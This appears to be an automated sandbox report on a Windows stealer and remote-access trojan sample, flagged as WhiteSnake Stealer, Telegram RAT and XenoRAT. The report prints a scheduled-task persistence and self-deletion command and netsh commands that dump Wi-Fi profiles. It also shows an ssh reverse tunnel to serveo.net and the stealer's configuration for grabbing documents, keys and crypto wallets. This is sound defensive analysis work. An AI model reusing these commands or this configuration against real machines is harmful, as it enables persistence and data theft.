                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                      Source: Amcache.hve.36.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.36.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.36.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.36.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                      Source: Amcache.hve.36.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.36.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.36.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.36.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.36.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.36.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                      Source: ssh.exe, 0000001F.00000002.4563063171.000001E39F239000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
                      Source: Amcache.hve.36.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                      Source: Amcache.hve.36.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.36.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.36.drBinary or memory string: VMware, Inc.
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                      Source: Amcache.hve.36.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.36.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: manager.exe, 0000002A.00000002.4561656216.000000000158B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?6
                      Source: Amcache.hve.36.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drBinary or memory string: qemu'#
                      Source: Amcache.hve.36.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                      Source: Amcache.hve.36.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                      Source: Amcache.hve.36.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: ssh.exe, 00000018.00000002.4563139619.0000020D735EA000.00000004.00000020.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2640663700.0000019232F75000.00000004.00000020.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3881086049.0000028989870000.00000004.00000020.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4457586264.000001ADB3577000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                      Source: 0LpFv1haTA.exe, 00000007.00000002.4651451428.0000021F2AE09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
                      Source: Amcache.hve.36.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.36.drBinary or memory string: vmci.syshbin`
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                      Source: Amcache.hve.36.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                      Source: Amcache.hve.36.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                      Source: Amcache.hve.36.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Users\user\AppData\Roaming\manager.exe "C:\Users\user\AppData\Roaming\manager.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                      Source: C:\Users\user\AppData\Roaming\manager.exeProcess created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe "C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "0lpfv1hata" /sc minute /tr "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe" /rl highest /f && del /f /s /q /a "c:\users\user\desktop\0lpfv1hata.exe" &&start "" "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe"
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "0lpfv1hata" /sc minute /tr "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe" /rl highest /f && del /f /s /q /a "c:\users\user\desktop\0lpfv1hata.exe" &&start "" "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeQueries volume information: C:\Users\user\Desktop\0LpFv1haTA.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeQueries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeQueries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeQueries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\manager.exeQueries volume information: C:\Users\user\AppData\Roaming\manager.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeQueries volume information: C:\Users\user\AppData\Roaming\XenoManager\manager.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exeQueries volume information: C:\Users\user\AppData\Roaming\XenoManager\manager.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeQueries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeQueries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeQueries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Uses netsh to modify the Windows network and firewall settings
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: Amcache.hve.36.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.36.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.36.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.36.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR
                      Yara detected WhiteSnake Stealer
                      Source: Yara matchFile source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR
                      Yara detected XenoRAT
                      Source: Yara matchFile source: 41.0.manager.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000029.00000000.2648249695.0000000000242000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: manager.exe PID: 8056, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\manager.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, type: DROPPED
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: eoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Downloads</string></args></command><command name="6"/> </commands></Commands>g></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><c
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: eoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Downloads</string></args></command><command name="6"/> </commands></Commands>g></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><c
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: eoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Downloads</string></args></command><command name="6"/> </commands></Commands>g></args></command><command 